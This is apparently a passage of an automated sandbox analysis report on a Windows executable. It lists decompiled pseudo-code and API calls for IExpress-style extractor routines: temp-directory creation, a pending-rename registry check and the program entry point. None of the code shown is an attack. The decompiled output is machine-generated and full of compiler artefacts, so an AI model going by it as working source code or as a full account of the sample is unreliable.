                                                                                                                                                                                                                                              0x0097453d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097453d
                                                                                                                                                                                                                                              0x00974554
                                                                                                                                                                                                                                              0x0097455a
                                                                                                                                                                                                                                              0x0097455a
                                                                                                                                                                                                                                              0x0097455a
                                                                                                                                                                                                                                              0x00974525
                                                                                                                                                                                                                                              0x0097468c

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 009745A3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000065), ref: 009745E3
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000002), ref: 0097460D
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00974630
                                                                                                                                                                                                                                              • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00974666
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 0097466F
                                                                                                                                                                                                                                                • Part of subcall function 0097681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0097686E
                                                                                                                                                                                                                                                • Part of subcall function 0097681F: GetSystemMetrics.USER32(0000004A), ref: 009768A7
                                                                                                                                                                                                                                                • Part of subcall function 0097681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009768CC
                                                                                                                                                                                                                                                • Part of subcall function 0097681F: RegQueryValueExA.ADVAPI32(?,00971140,00000000,?,?,0000000C), ref: 009768F4
                                                                                                                                                                                                                                                • Part of subcall function 0097681F: RegCloseKey.ADVAPI32(?), ref: 00976902
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                              • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                              • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                              • Opcode ID: 7bc473780c9cc964c844bbf9ccf81ed1872b22e60d72a3cc9b3b11bdcd40c132
                                                                                                                                                                                                                                              • Instruction ID: 6773cbdfebc5463287d3b77af544879a30c5fbb7f6729f73aada894e476aa2ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bc473780c9cc964c844bbf9ccf81ed1872b22e60d72a3cc9b3b11bdcd40c132
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13510473904215ABDB219F28CC48BAABB6DEF85300F148194FD1DA7242DB31DE45DBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E009753A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t5;
                                                                                                                                                                                                                                              				long _t13;
                                                                                                                                                                                                                                              				int _t14;
                                                                                                                                                                                                                                              				CHAR* _t20;
                                                                                                                                                                                                                                              				int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t5 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                              				_t32 = __edx;
                                                                                                                                                                                                                                              				_t20 = __ecx;
                                                                                                                                                                                                                                              				_t29 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					E0097171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                              					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                              					_t29 = _t29 + 1;
                                                                                                                                                                                                                                              					E00971680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                              					E0097658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                              					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                              					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                              					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t29 < 0x190) {
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                                                              					_t30 = 0;
                                                                                                                                                                                                                                              					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                              						_t30 = 1;
                                                                                                                                                                                                                                              						DeleteFileA(_t32);
                                                                                                                                                                                                                                              						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return E00976CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t30 = 1;
                                                                                                                                                                                                                                              				 *0x978a20 = 1;
                                                                                                                                                                                                                                              				goto L5;
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              0x009753ac
                                                                                                                                                                                                                                              0x009753b3
                                                                                                                                                                                                                                              0x009753b9
                                                                                                                                                                                                                                              0x009753bb
                                                                                                                                                                                                                                              0x009753bd
                                                                                                                                                                                                                                              0x009753bf
                                                                                                                                                                                                                                              0x009753d1
                                                                                                                                                                                                                                              0x009753d6
                                                                                                                                                                                                                                              0x009753e0
                                                                                                                                                                                                                                              0x009753e2
                                                                                                                                                                                                                                              0x009753f5
                                                                                                                                                                                                                                              0x009753fb
                                                                                                                                                                                                                                              0x00975402
                                                                                                                                                                                                                                              0x0097540b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975413
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975415
                                                                                                                                                                                                                                              0x00975416
                                                                                                                                                                                                                                              0x00975427
                                                                                                                                                                                                                                              0x0097542a
                                                                                                                                                                                                                                              0x0097542b
                                                                                                                                                                                                                                              0x00975434
                                                                                                                                                                                                                                              0x00975434
                                                                                                                                                                                                                                              0x0097543a
                                                                                                                                                                                                                                              0x0097544c
                                                                                                                                                                                                                                              0x0097544c
                                                                                                                                                                                                                                              0x00975452
                                                                                                                                                                                                                                              0x0097545a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097545e
                                                                                                                                                                                                                                              0x0097545f
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097171E: _vsnprintf.MSVCRT ref: 00971750
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 009753FB
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975402
                                                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097541F
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0097542B
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975434
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00975452
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                              • API String ID: 1082909758-775753704
                                                                                                                                                                                                                                              • Opcode ID: d36395f2e3faf5e60063e5eff7b2bee59e81d6634ad4711526e91db210768fb3
                                                                                                                                                                                                                                              • Instruction ID: 8f72d230d10bdc06b23c305b5519f62a6a1e181cc7d7fe7834efc6772a3cd88d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d36395f2e3faf5e60063e5eff7b2bee59e81d6634ad4711526e91db210768fb3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C11277330850467E7209B369C49FEF366DEFC2711F008425F64ED21A0DEB48D8296A5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 563 97256d-97257d 564 972583-972589 563->564 565 972622-972627 call 9724e0 563->565 566 97258b 564->566 567 9725e8-972607 RegOpenKeyExA 564->567 570 972629-97262f 565->570 569 972591-972595 566->569 566->570 571 9725e3-9725e6 567->571 572 972609-972620 RegQueryInfoKeyA 567->572 569->570 574 97259b-9725ba RegOpenKeyExA 569->574 571->570 575 9725d1-9725dd RegCloseKey 572->575 574->571 576 9725bc-9725cb RegQueryValueExA 574->576 575->571 576->575
                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E0097256D(signed int __ecx) {
                                                                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                                                              				int _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t31 = E009724E0(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t34 = _t13 - 1;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						_v8 = 0;
                                                                                                                                                                                                                                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                                                                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                              							if(_t24 == 0) {
                                                                                                                                                                                                                                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                              								L6:
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                              								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							_t31 = _v8;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t31;
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x00972572
                                                                                                                                                                                                                                              0x00972573
                                                                                                                                                                                                                                              0x00972575
                                                                                                                                                                                                                                              0x00972578
                                                                                                                                                                                                                                              0x0097257d
                                                                                                                                                                                                                                              0x00972627
                                                                                                                                                                                                                                              0x00972583
                                                                                                                                                                                                                                              0x00972586
                                                                                                                                                                                                                                              0x00972589
                                                                                                                                                                                                                                              0x009725eb
                                                                                                                                                                                                                                              0x00972607
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972609
                                                                                                                                                                                                                                              0x0097261a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097261a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097258b
                                                                                                                                                                                                                                              0x0097258b
                                                                                                                                                                                                                                              0x0097259e
                                                                                                                                                                                                                                              0x009725b2
                                                                                                                                                                                                                                              0x009725ba
                                                                                                                                                                                                                                              0x009725cb
                                                                                                                                                                                                                                              0x009725d1
                                                                                                                                                                                                                                              0x009725d6
                                                                                                                                                                                                                                              0x009725da
                                                                                                                                                                                                                                              0x009725dd
                                                                                                                                                                                                                                              0x009725dd
                                                                                                                                                                                                                                              0x009725e3
                                                                                                                                                                                                                                              0x009725e3
                                                                                                                                                                                                                                              0x009725e3
                                                                                                                                                                                                                                              0x0097258b
                                                                                                                                                                                                                                              0x00972589
                                                                                                                                                                                                                                              0x0097262f
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00974096,00974096,?,00971ED3,00000001,00000000,?,?,00974137,?), ref: 009725B2
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00974096,?,00971ED3,00000001,00000000,?,?,00974137,?,00974096), ref: 009725CB
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,00971ED3,00000001,00000000,?,?,00974137,?,00974096), ref: 009725DD
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00974096,00974096,?,00971ED3,00000001,00000000,?,?,00974137,?), ref: 009725FF
                                                                                                                                                                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00974096,00000000,00000000,00000000,00000000,?,00971ED3,00000001,00000000), ref: 0097261A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009725F5
                                                                                                                                                                                                                                              • PendingFileRenameOperations, xrefs: 009725C3
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager, xrefs: 009725A8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                              • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                              • Opcode ID: fc6635eee8bf17df4779ba5640b4697aa41bd6b752ce82f5f9442126b5e4b8e2
                                                                                                                                                                                                                                              • Instruction ID: c47c4147ae3b7cf3959cdc58a9bbc8f459e9590c599afca0e1b23a5346d65c64
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc6635eee8bf17df4779ba5640b4697aa41bd6b752ce82f5f9442126b5e4b8e2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1114236A66228BB9B209B919C0DDFF7EBCEF45BA1F108056B80CE2010D6305E44E6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 577 976a60-976a91 call 977155 call 977208 GetStartupInfoW 583 976a93-976aa2 577->583 584 976aa4-976aa6 583->584 585 976abc-976abe 583->585 586 976aaf-976aba Sleep 584->586 587 976aa8-976aad 584->587 588 976abf-976ac5 585->588 586->583 587->588 589 976ac7-976acf _amsg_exit 588->589 590 976ad1-976ad7 588->590 591 976b0b-976b11 589->591 592 976b05 590->592 593 976ad9-976ae9 call 976c3f 590->593 594 976b13-976b24 _initterm 591->594 595 976b2e-976b30 591->595 592->591 599 976aee-976af2 593->599 594->595 597 976b32-976b39 595->597 598 976b3b-976b42 595->598 597->598 600 976b67-976b71 598->600 601 976b44-976b51 call 977060 598->601 599->591 602 976af4-976b00 599->602 605 976b74-976b79 600->605 601->600 612 976b53-976b65 601->612 603 976c39-976c3e call 97724d 602->603 608 976bc5-976bc8 605->608 609 976b7b-976b7d 605->609 613 976bd6-976be3 _ismbblead 608->613 614 976bca-976bd3 608->614 610 976b94-976b98 609->610 611 976b7f-976b81 609->611 617 976ba0-976ba2 610->617 618 976b9a-976b9e 610->618 611->608 616 976b83-976b85 611->616 612->600 619 976be5-976be6 613->619 620 976be9-976bed 613->620 614->613 616->610 622 976b87-976b8a 616->622 623 976ba3-976bbc call 972bfb 617->623 618->623 619->620 620->605 621 976c1e-976c25 620->621 627 976c27-976c2d _cexit 621->627 628 976c32 621->628 622->610 625 976b8c-976b92 622->625 623->621 630 976bbe-976bbf exit 623->630 625->616 627->628 628->603 630->608
                                                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int* _t25;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed char _t41;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t67;
                                                                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				E00977155();
                                                                                                                                                                                                                                              				_push(0x58);
                                                                                                                                                                                                                                              				_push(0x9772b8);
                                                                                                                                                                                                                                              				E00977208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                              				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                              				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                              				_t53 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                              					if(0 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(0 != _t56) {
                                                                                                                                                                                                                                              						Sleep(0x3e8);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t58 = 1;
                                                                                                                                                                                                                                              						_t53 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_t67 =  *0x9788b0 - _t58; // 0x2
                                                                                                                                                                                                                                              					if(_t67 != 0) {
                                                                                                                                                                                                                                              						__eflags =  *0x9788b0; // 0x2
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							 *0x9781e4 = _t58;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0x9788b0 = _t58;
                                                                                                                                                                                                                                              							_t37 = E00976C3F(0x9710b8, 0x9710c4); // executed
                                                                                                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              								_t30 = 0xff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(0x1f);
                                                                                                                                                                                                                                              						L00976FF4();
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t68 =  *0x9788b0 - _t58; // 0x2
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_push(0x9710b4);
                                                                                                                                                                                                                                              							_push(0x9710ac);
                                                                                                                                                                                                                                              							L00977202();
                                                                                                                                                                                                                                              							 *0x9788b0 = 2;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                                                                                                              							 *0x9788ac = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t71 =  *0x9788b4;
                                                                                                                                                                                                                                              						if( *0x9788b4 != 0 && E00977060(_t71, 0x9788b4) != 0) {
                                                                                                                                                                                                                                              							_t60 =  *0x9788b4; // 0x0
                                                                                                                                                                                                                                              							 *0x97a288(0, 2, 0);
                                                                                                                                                                                                                                              							 *_t60();
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                              						_t59 =  *_t25;
                                                                                                                                                                                                                                              						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t41 =  *_t59;
                                                                                                                                                                                                                                              							if(_t41 > 0x20) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							if(_t41 != 0) {
                                                                                                                                                                                                                                              								if(_t54 != 0) {
                                                                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                              										_t59 = _t59 + 1;
                                                                                                                                                                                                                                              										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              										_t41 =  *_t59;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                              								_t29 = 0xa;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(_t29);
                                                                                                                                                                                                                                              							_t30 = E00972BFB(0x970000, 0, _t59); // executed
                                                                                                                                                                                                                                              							 *0x9781e0 = _t30;
                                                                                                                                                                                                                                              							__eflags =  *0x9781f8;
                                                                                                                                                                                                                                              							if( *0x9781f8 == 0) {
                                                                                                                                                                                                                                              								exit(_t30); // executed
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *0x9781e4;
                                                                                                                                                                                                                                              							if( *0x9781e4 == 0) {
                                                                                                                                                                                                                                              								__imp___cexit();
                                                                                                                                                                                                                                              								_t30 =  *0x9781e0; // 0x80070002
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              							goto L40;
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                              							if(_t41 == 0x22) {
                                                                                                                                                                                                                                              								__eflags = _t54;
                                                                                                                                                                                                                                              								_t15 = _t54 == 0;
                                                                                                                                                                                                                                              								__eflags = _t15;
                                                                                                                                                                                                                                              								_t54 = 0 | _t15;
                                                                                                                                                                                                                                              								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                              							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                              							__eflags = _t26;
                                                                                                                                                                                                                                              							if(_t26 != 0) {
                                                                                                                                                                                                                                              								_t59 = _t59 + 1;
                                                                                                                                                                                                                                              								__eflags = _t59;
                                                                                                                                                                                                                                              								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t59 = _t59 + 1;
                                                                                                                                                                                                                                              							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L40:
                                                                                                                                                                                                                                              					return E0097724D(_t30);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t58 = 1;
                                                                                                                                                                                                                                              				__eflags = 1;
                                                                                                                                                                                                                                              				goto L7;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00976a60
                                                                                                                                                                                                                                              0x00976a6a
                                                                                                                                                                                                                                              0x00976a6c
                                                                                                                                                                                                                                              0x00976a71
                                                                                                                                                                                                                                              0x00976a78
                                                                                                                                                                                                                                              0x00976a7f
                                                                                                                                                                                                                                              0x00976a85
                                                                                                                                                                                                                                              0x00976a8e
                                                                                                                                                                                                                                              0x00976a91
                                                                                                                                                                                                                                              0x00976a93
                                                                                                                                                                                                                                              0x00976a9c
